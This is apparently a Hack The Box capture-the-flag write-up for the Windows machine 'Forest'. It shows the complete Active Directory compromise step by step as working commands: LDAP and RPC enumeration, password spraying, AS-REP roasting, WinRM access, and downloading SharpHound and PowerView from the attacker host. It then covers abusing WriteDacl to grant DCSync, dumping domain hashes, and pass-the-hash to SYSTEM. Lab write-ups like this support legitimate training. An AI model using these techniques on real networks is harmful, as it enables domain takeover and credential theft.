Windows Boxes

forest

  1. nmapAutomator
    1. nmap quickscan
    2. nmap basic scan
    3. nmap UDP scan
    4. nmap full scan
    5. nmap vulns scan
    6. Recon Recommendations
      1. smb recon
      2. ldap recon
  2. ldap
    1. recon suggestion from nmapAuto
    2. ldapsearch w/ DC
      1. grep -i memberof
      2. search objectclass person
        1. grep sAMAccountName
        2. userlist.ldap
        3. extra username in rpcclient
  3. Initial Foothold
    1. smb
    2. password spray user accts w/ custom password list
      1. hashcat best64 rule
      2. add !s / toggle1.rule
      3. make passwords length 7 minimum
      4. crackmapexec
        1. null authentication allows domain enumeration
        2. crackmapexec Brute Force
      5. enum4linux
    3. getNPUsers.py
      1. hashcat BF ticket
      2. evil-winrm
  4. privesc
    1. sharphound
      1. run SharpHound.exe on victim
      2. encode/copy/paste files back to attack machine
      3. OR set up smb share between attack and victim machines
    2. neo4j
      1. bloodhound
      2. shortest path from owned Principals
        1. query: shortest path to domain admin from owned principals
        2. WriteDacl Abuse info
      3. report summary
    3. attackpath
      1. Create a user on the domain
      2. Add the user to the Exchange Windows Permission group
      3. Give the user DcSync privileges
        1. Add-DomainObjectAcl error
      4. Perform a DcSync attack and dump the password hashes of all the users on the domain
      5. Perform a Pass the Hash attack to get access to the administrator’s account
  5. user/root
  6. Lessons Learned

forest

images/1137-1.png
images/1137-2.png

nmapAutomator

let's start off with the nmapAutomator script (written by 21y4d; not to be confused with Tib3rius' AutoRecon)
./nmapAutomator.sh 10.10.10.161 All
• nmap quickscan
• nmap basic scan
• nmap UDP scan
• nmap full scan
• nmap vulns scan
• Recon Recommendations

images/1138-1.png
Notes:

1. Since Kerberos and LDAP are running, chances are we're dealing with a Windows Active Directory box.
2. The nmap scan leaks the domain and hostname: htb.local and FOREST.htb.local. Similarly, the SMB OS nmap scan leaks the operating system: Windows Server 2016 Standard 14393.
3. Port 389 is running LDAP. We'll need to query it for any useful information. Same goes for SMB.
4. The WSMan and WinRM services are open. If we find credentials through SMB or LDAP, we can use these services to remotely connect to the box.

nmap quickscan

images/1139-1.png

nmap basic scan

images/1140-1.png
images/1140-2.png

nmap UDP scan

images/1141-1.png


images/1141-2.png

nmap full scan

images/1142-1.png

images/1142-2.png

nmap vulns scan

images/1143-1.png

all failed*

Recon Recommendations

images/1144-1.png

smb recon

images/1146-1.png

ldap recon

images/1147-1.png

ldap

thanks to the naming context, we know the domain is htb.local (DC=htb,DC=local) and this box is its domain controller

ldapsearch -h 10.10.10.161 -x -s base namingcontexts
images/1149-1.png
DC=htb,DC=local

recon suggestion from nmapAuto

we can enumerate the ldap service with ldapsearch

ldapsearch -x -h 10.10.10.161 -s base | tee recon/ldapsearch_10.10.10.161.txt
images/1150-1.png

ldapsearch w/ DC

images/1152-1.png

where


images/1152-2.png
images/1152-3.png

grep -i memberof

images/1153-1.png

grep sAMAccountName

we're gathering all these sAMAccountNames so we can password spray them
images/1155-1.png

userlist.ldap

we're going to use grep and awk to pull all these account names into a file (grep -i, because AD hands the attribute back as sAMAccountName no matter how we spelled it in the query)

ldapsearch -h 10.10.10.161 -x -b "DC=htb,DC=local" '(objectclass=Person)' sAMAccountName sAMAccountType | grep -i sAMAccountName: | awk '{print $2}' > userlist.ldap
images/1156-1.png

gives us a very clean list of users
images/1156-2.png
we want to narrow these down to real user accounts and drop the machine/service accounts, since those have automatically generated passwords that are practically impossible to crack

list ends up looking like this

images/1156-3.png
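The grep/awk pipeline above plus the manual pruning, done in one pass. This is an added example, not part of the original writeup: the filter assumes machine accounts end in '$' and that the Exchange-generated HealthMailbox*/SM_* accounts are the noise worth dropping, and the LDIF it runs on is constructed (the real dump has many more attributes per entry).

```shell
#!/bin/sh
# Added example (not from the original writeup): turn the ldapsearch dump into a
# spray-ready user list in one pass, dropping the accounts that are not worth
# spraying. Assumptions: machine accounts end in '$' and the Exchange-generated
# HealthMailbox*/SM_* accounts have random passwords; the LDIF below is constructed.

# extract_users: read LDIF on stdin, print one sAMAccountName per line,
# minus machine/Exchange system accounts, sorted and deduplicated.
extract_users() {
    # match the attribute case-insensitively: AD returns it as sAMAccountName no
    # matter how the query spelled it. The trailing space skips "::" (base64) lines.
    grep -i '^sAMAccountName: ' \
        | awk '{print $2}' \
        | grep -v '\$$' \
        | grep -Ev '^(HealthMailbox|SM_)' \
        | LC_ALL=C sort -u
}

# dump_users DC [BASE_DN]: same list straight from the DC over an anonymous bind.
dump_users() {
    dc="$1"; base="${2:-DC=htb,DC=local}"
    ldapsearch -x -H "ldap://$dc" -b "$base" '(objectClass=person)' sAMAccountName \
        | extract_users
}

# Constructed LDIF standing in for the real dump.
SAMPLE_LDIF='dn: CN=FOREST,OU=Domain Controllers,DC=htb,DC=local
sAMAccountName: FOREST$

dn: CN=Guest,CN=Users,DC=htb,DC=local
sAMAccountName: Guest

dn: CN=HealthMailbox0a1b2c3,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=local
sAMAccountName: HealthMailbox0a1b2c3

dn: CN=SM_0123456789abcdef0,CN=Users,DC=htb,DC=local
sAMAccountName: SM_0123456789abcdef0

dn: CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
sAMAccountName: svc-alfresco

dn: CN=jdoe,CN=Users,DC=htb,DC=local
sAMAccountName: jdoe
'

# Usage: printf '%s' "$SAMPLE_LDIF" | extract_users
#        dump_users 10.10.10.161 > userlist.ldap
```

Guest survives the filter on purpose: whether built-ins are disabled is a userAccountControl question, not a name question, so check that separately (or let the spray tell you).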

extra username in rpcclient

rpcclient's enumdomusers command shows us we're missing a user account!

rpcclient -U '' -N 10.10.10.161   (-N so it doesn't prompt for a password: a null session)
images/1165-1.png

by connecting with rpcclient and issuing enumdomusers we see that images/1165-2.png is an account we missed!
images/1165-3.png
images/1165-4.png


images/1165-5.png
images/1165-6.png
svc-alfresco

Initial Foothold




smb

let's enumerate the SMB shares as well with smbmap/smbclient

smbmap -H 10.10.10.161
images/1148-1.png

smbclient -L //10.10.10.161 -N
images/1148-2.png

nothing here, but we can try brute-forcing a login with our userlist and a password list

password spray user accts w/ custom password list

we want to save time and not use rockyou, so we're going to make our own list from words tied to the box
images/1157-1.png
images/1157-2.png


we can add years to the list with a bit of shell (a while/read loop rather than for i in $(cat ...), which would word-split any entry containing spaces)
while IFS= read -r i; do echo "$i"; echo "${i}2019"; echo "${i}2020"; done < pwlist.txt
images/1157-3.png
images/1157-4.png

store the wordlist in a temp file t and mv it to pwlist.txt
while IFS= read -r i; do echo "$i"; echo "${i}2019"; echo "${i}2020"; done < pwlist.txt > t
images/1157-5.png
mv t pwlist.txt
images/1157-6.png

it would be laughable if the password were in this list as-is, but we can make the list much more complex with hashcat's rule engine




hashcat best64 rule

using the hashcat rule best64 will mutate our pwlist

hashcat --force --stdout pwlist.txt -r /usr/share/hashcat/rules/best64.rule
images/1158-1.png
images/1158-2.png

this mutates our original password list and does a lot of really cool things!

add !s / toggle1.rule

our list doesn't have any exclamation points, so let's go back and generate a wordlist that has them (into the temp file t again; the '!' is single-quoted so an interactive bash doesn't try history expansion on it)

while IFS= read -r i; do printf '%s\n' "$i" "$i"'!'; done < pwlist.txt > t
images/1159-1.png
cat t
images/1159-2.png

copy our temp wordlist t to pwlist.txt
images/1159-3.png

images/1159-4.png

we can also chain rules, e.g. add toggles1.rule (a second -r, from the same /usr/share/hashcat/rules directory) to mix upper and lower case letters

images/1159-5.png

after using these rules we have a total of 50000+ passwords we're going to use!
images/1159-6.png



make passwords length 7 minimum

last we're going to ensure our passwords are at least 7 characters long

awk 'length($0) >= 7' pwlist.txt | wc -l
images/1160-1.png

limiting the list to passwords of 7 characters or more narrows it down from 50k to ~40k. Mind the comparison: length($0) > 7 (as in the screenshot) keeps only 8+ characters and would have thrown away 7-character candidates like s3rvice, the very password we end up cracking later
images/1160-2.png

output to t
images/1160-3.png

and cp t pwlist.txt
images/1160-4.png
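The whole list-building procedure above (years, exclamation marks, case toggle, minimum length, dedupe) as one shell function instead of three passes through temp files. This is an added example, not code from the original writeup: it stands in for the best64/toggles1 hashcat rules in plain shell so it runs offline without hashcat, and the base words it is fed are constructed.

```shell
#!/bin/sh
# Added example (not from the original writeup): the for/cat loops above break on
# any word containing whitespace and need three passes plus temp files. This
# builds the spray list in one function: year and "!" suffixes, a first-letter
# toggle (the part of toggles1.rule we care about), then the length filter and
# dedupe. Plain shell stands in for the hashcat rule chain so it runs anywhere;
# the base words below are constructed.

# mutate_wordlist MINLEN [YEAR...]: read base words on stdin, emit candidates.
# Usage: mutate_wordlist 7 2019 2020 < pwlist.txt > t
mutate_wordlist() {
    minlen="$1"; shift
    years="$*"
    while IFS= read -r w; do
        [ -n "$w" ] || continue
        # toggle the first letter to upper case (toggles1.rule, position 0)
        first=$(printf '%s' "$w" | cut -c1 | tr '[:lower:]' '[:upper:]')
        cap="$first$(printf '%s' "$w" | cut -c2-)"
        for base in "$w" "$cap"; do
            printf '%s\n' "$base" "$base!"
            for y in $years; do
                printf '%s\n' "$base$y" "$base$y!"
            done
        done
    done | awk -v n="$minlen" 'length($0) >= n' | LC_ALL=C sort -u
}

# Constructed base words; the real list came from the box's name and services.
SAMPLE_WORDS='forest
secret'

# Usage: printf '%s\n' "$SAMPLE_WORDS" | mutate_wordlist 7 2019 2020
```

Each 6-letter base word yields 10 survivors at a 7-character minimum (the bare word and its capitalised form fall out, everything with a suffix stays), so the two sample words give 20 candidates. Use >= for the minimum, not >, for the s3rvice reason above.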

crackmapexec

images/1161-1.png

we can also try a crackmapexec null-authentication attempt,
where we pass empty strings for the username and password
images/1161-2.png
it doesn't log us in, but it does allow domain enumeration (see child node)

important: the password policy pulled back over that null session shows no account lockout threshold, so we're free to brute force without locking anyone out
images/1161-3.png



null authentication allows domain enumeration

images/1163-1.png

domain enumeration
images/1163-2.png
images/1163-3.png

images/1163-4.png

crackmapexec Brute Force

now that we've generated our password list, let's use our ldap userlist along with it and try to brute force our way into SMB
crackmapexec smb 10.10.10.161 -u userlist.ldap -p pwlist.txt
images/1164-1.png

this will run for a while, so keep it open and check back; it will fail a lot!

heres a taste of the output
images/1164-2.png

enum4linux

really ugly output, so I'm not going to paste it beyond a few enumeration results we already found

enum4linux 10.10.10.161
images/1162-1.png

images/1162-2.png
users

images/1162-3.png

getNPUsers.py

If Kerberos pre-authentication is disabled on any of the box's accounts, we can use impacket's GetNPUsers.py to send an AS-REQ for that user without knowing the password. The Key Distribution Center (KDC) answers with an AS-REP whose encrypted part is encrypted with a key derived from the user's password (this is AS-REP roasting). From there, we can take that encrypted blob offline, run it through a password cracker and brute force the password.

GetNPUsers.py htb.local/ -dc-ip 10.10.10.161 -request
images/1167-1.png
images/1167-2.png
Kerberos pre-authentication is disabled for the user svc-alfresco, and the KDC gave us back an AS-REP that we can crack offline

$krb5asrep$23$svc-alfresco@HTB.LOCAL:4933542ada6053e22fa16eacac49dc5d$6f4f91cc61441ebca25cad737b2941e4349126068e0e575b7b13d0ff5b748acfb529e8d18353750a618ef3a16e506ad9e9beb93e932f2fc088357d0fe8e3180d69c572d7561d62d5dd31fce165b10088f3a79f6b0a7d31f1dd6209e08e42d14f540a909f2803b182d588a9f3171c99282c88d29c17e9774c7f69c0e60a9c12f2cb2f2440468f61684b8f6e992e2b10b7620c9bd8891e6f7978cdb665e29417df2bd6f2003373babc82a92d07a1e9cf5a8566da337aee509bccbc8975e5ec749f201158e24730c811a485b9d810ea92df5cf741591d8a98ed44295cb750cd29f755b85a26f63c

let's save the ticket to hash.txt

hashcat BF ticket

images/1168-1.png
images/1168-2.png hashcat's example hashes show two Kerberos etype-23 modes: 13100 for TGS-REP tickets ($krb5tgs$23$...) and 18200 for AS-REP ($krb5asrep$23$...). Ours starts with $krb5asrep$23$, so the mode is 18200
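A small check for the 13100-vs-18200 question above, and for the ticket's layout, before kicking off a long crack. This is an added example, not part of the original writeup; it only handles the etype-23 (RC4-HMAC) formats this page deals with, and the sample line is the AS-REP GetNPUsers returned for svc-alfresco above.

```shell
#!/bin/sh
# Added example (not from the original writeup): decide which hashcat mode a
# Kerberos ticket line needs and sanity-check its layout before starting a long
# crack. Only the etype-23 (RC4-HMAC) formats the page deals with are handled;
# SAMPLE_ASREP is the svc-alfresco AS-REP from the writeup.

# krb_mode LINE: print 18200 for an AS-REP ($krb5asrep$23$...) or 13100 for a
# TGS-REP ($krb5tgs$23$...); anything else prints nothing and returns 1.
krb_mode() {
    case "$1" in
        '$krb5asrep$23$'*) echo 18200 ;;
        '$krb5tgs$23$'*)   echo 13100 ;;
        *) return 1 ;;
    esac
}

# asrep_field LINE FIELD: pull user, realm, checksum or cipher out of an
# etype-23 AS-REP line, which is laid out as
#   $krb5asrep$23$user@REALM:checksum$ciphertext
# For RC4-HMAC the checksum is a 16-byte HMAC-MD5, so it must be exactly 32 hex
# chars; the ciphertext is the rest of the AS-REP enc-part. Malformed lines
# (truncated copy/paste, wrong etype) return 1 instead of a field.
asrep_field() {
    line="$1" field="$2"
    case "$line" in '$krb5asrep$23$'*) ;; *) return 1 ;; esac
    rest="${line#\$krb5asrep\$23\$}"
    principal="${rest%%:*}"
    enc="${rest#*:}"
    checksum="${enc%%\$*}"
    cipher="${enc#*\$}"
    printf '%s' "$checksum" | grep -Eq '^[0-9a-fA-F]{32}$' || return 1
    printf '%s' "$cipher"   | grep -Eq '^[0-9a-fA-F]+$'    || return 1
    case "$field" in
        user)     printf '%s\n' "${principal%@*}" ;;
        realm)    printf '%s\n' "${principal#*@}" ;;
        checksum) printf '%s\n' "$checksum" ;;
        cipher)   printf '%s\n' "$cipher" ;;
        *) return 1 ;;
    esac
}

SAMPLE_ASREP='$krb5asrep$23$svc-alfresco@HTB.LOCAL:4933542ada6053e22fa16eacac49dc5d$6f4f91cc61441ebca25cad737b2941e4349126068e0e575b7b13d0ff5b748acfb529e8d18353750a618ef3a16e506ad9e9beb93e932f2fc088357d0fe8e3180d69c572d7561d62d5dd31fce165b10088f3a79f6b0a7d31f1dd6209e08e42d14f540a909f2803b182d588a9f3171c99282c88d29c17e9774c7f69c0e60a9c12f2cb2f2440468f61684b8f6e992e2b10b7620c9bd8891e6f7978cdb665e29417df2bd6f2003373babc82a92d07a1e9cf5a8566da337aee509bccbc8975e5ec749f201158e24730c811a485b9d810ea92df5cf741591d8a98ed44295cb750cd29f755b85a26f63c'

# Usage: hashcat -m "$(krb_mode "$SAMPLE_ASREP")" hash.txt /usr/share/wordlists/rockyou.txt
```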

hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt --force
images/1168-3.png
images/1168-4.png

svc-alfresco's password is s3rvice

evil-winrm

now that we have the username and password we can use evil-winrm to gain an initial foothold on the box. This is only possible because WinRM (WSMan, port 5985) is open

evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice
images/1169-1.png

and we're in! we can grab the user flag

privesc

thanks to evil-winrm with svc-alfresco's credentials, we've gained an initial foothold on the box

we can issue net user /domain to confirm the AD accounts
images/1174-1.png
images/1174-2.png
and check out what type of user svc-alfresco is

images/1174-3.png

from this info we see svc-alfresco is both a domain user and a service account:
images/1174-4.png


sharphound

from here lets run sharphound to see if there are any exploitable paths to privesc

images/1173-1.png
images/1173-2.png

we're going to download this file onto the victim box and run it as svc-alfresco

1) set up http server
images/1173-3.png
images/1173-4.png

2) get the latest version of BloodHound since it's updated regularly; the SharpHound collector has to match the BloodHound version you import into, so take both from the same release
images/1173-5.png
images/1173-6.png

3) Download SharpHound.exe onto our victim machine and run it

(new-object system.net.webclient).downloadfile('http://10.10.14.62:5555/SharpHound.exe', 'C:\Users\svc-alfresco\Documents\SharpHound.exe')

images/1173-7.png

images/1173-8.png

run SharpHound.exe on victim

.\SharpHound.exe -c all
images/1175-1.png

images/1175-2.png

encode/copy/paste files back to attack machine

images/1176-1.png

we want to run
images/1176-2.png on our attack machine

We need to transfer the ZIP file to our attack machine. To do that, base64 encode the file with certutil:

images/1176-3.png
images/1176-4.png
certutil -encode <file>.zip <file>.b64

Then output the base64 encoded file (type <file>.b64) and copy it.

images/1176-5.png
On the attack machine, strip the -----BEGIN CERTIFICATE----- / -----END CERTIFICATE----- lines certutil wraps around the data, then base64 -d the rest back into the zip.

images/1176-6.png

Drag and drop the zipped file into BloodHound. Then set the start node to be the svc-alfresco user.


OR set up smb share between attack and victim machines

first we want to set up an SMB server on our attacking machine; we'll use impacket's smbserver to initialize it

impacket-smbserver PleaseSubscribe $(pwd) -smb2support -user ippsec -password SupportMeOnPatreon
where
• the share name is PleaseSubscribe
• $(pwd) shares the current directory
• -smb2support enables SMB2, which newer Windows clients need
• -user sets the username to ippsec
• -password sets the password to SupportMeOnPatreon

images/1179-1.png


from here we need to store these credentials in a variable on our victim machine
1. set our password to the variable $passimages/1179-2.png
$pass = ConvertTo-SecureString 'SupportMeOnPatreon' -AsPlainText -Force
2. now we create a
cred variable and add our username and passimages/1179-3.png
$cred = New-Object System.Management.Automation.PSCredential('ippsec', $pass)
3. now we connect to our smbserver from our victim machine with this command
images/1179-4.png
New-PSDrive -Name ippsec -PSProvider FileSystem -Credential $cred -Root \\10.10.14.62\PleaseSubscribe

and we're connected! impacket server shoots back this message:
images/1179-5.pngimages/1179-6.png




neo4j

lets set up the bloodhound database on our attacking machine:

neo4j console
images/1177-1.png
images/1177-2.png

bloodhound

now let's run bloodhound from our attacking machine and load in the report file images/1178-1.png extracted from our victim


images/1178-2.png

now drag and drop our zip file into bloodhound
images/1178-3.png


images/1178-4.png

mark the user svc-alfresco as owned
images/1178-5.png

and query shortest path from owned Principals
images/1178-6.png

shortest path from owned Principals

images/1180-1.png

query: shortest path to domain admin from owned principals

images/1171-1.png

This path shows that svc-alfresco is a member of Service Accounts, which through nested group membership lands in Account Operators. Account Operators can create users and add them to the Exchange Windows Permissions group, and that group has WriteDacl on the domain object itself, which is enough to grant ourselves DCSync and dump every hash in the domain, Administrator's included.
images/1171-2.png

WriteDacl Abuse info

we go over abusing this in the attackpath node:

images/1189-1.png


images/1189-2.png
(we also add -PrincipalIdentity <user> in this statement, more on this later)

report summary

images/1181-1.png

attackpath

images/1183-1.png

Create a user on the domain

net user <user> <password> /add /domain
images/1182-1.png

net user /domain
images/1182-2.png
we see our account images/1182-3.png was created

Add the user to the Exchange Windows Permission group

net group "Exchange Windows Permissions" /add steve
images/1184-1.png


now to confirm our account was put into that group
net user steve
images/1184-2.png

Give the user DcSync privileges

Give the user DCSync privileges. We'll use PowerView for this. First download PowerView and set up a python HTTP server in the directory it resides in.

images/1185-1.png

(new-object system.net.webclient).downloadfile('http://10.10.14.62:5555/powerview.ps1', 'C:\Users\svc-alfresco\Documents\powerview.ps1')
images/1185-2.png

Use the
Add-DomainObjectAcl function in PowerView to give the user DCSync privileges.

$pass = convertto-securestring 'password' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('htb\steve', $pass)
images/1185-3.png

Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity steve -Rights DCSync
images/1185-4.png



Add-DomainObjectAcl error

we see that Add-DomainObjectAcl isn't recognized; let's check whether the cmdlet is actually in our powerview.ps1

images/1188-1.png

grep -i Add-Domain PowerView.ps1
images/1188-2.png

no sign of Add-Domain* in our PowerView.ps1 (the master branch doesn't have it), so let's download the dev branch version
images/1188-3.png


images/1188-4.png

Perform a DcSync attack and dump the password hashes of all the users on the domain

We're going to dump the password hashes with impacket's secretsdump as steve; it pulls them through the DRSUAPI replication calls (DCSync), which is exactly the right we just granted

impacket-secretsdump htb.local/steve:password@10.10.10.161
images/1186-1.png

images/1186-2.png

htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::

Perform a Pass the Hash attack to get access to the administrator’s account

now to take the administrator's hash and pass it with psexec.py

Administrator's hash from the dump, as LM:NT (drop the RID in front and the trailing ::: secretsdump prints; the LM half aad3b435b51404eeaad3b435b51404ee is just the empty-LM placeholder, only the NT half is real):
aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6

./psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 administrator@10.10.10.161
images/1187-1.png
images/1187-2.png

and we get a nt authority\system shell!
images/1187-3.png

user/root

images/1172-1.png
e5e4e47ae7022664cda6eb013fb0d9ed

images/1172-2.png
f048153f202bbb2f82622b04d79129cc

Lessons Learned

Check out Rana Khalil's OSCP writeups and prep at https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/
images/1455-1.png
images/1455-2.png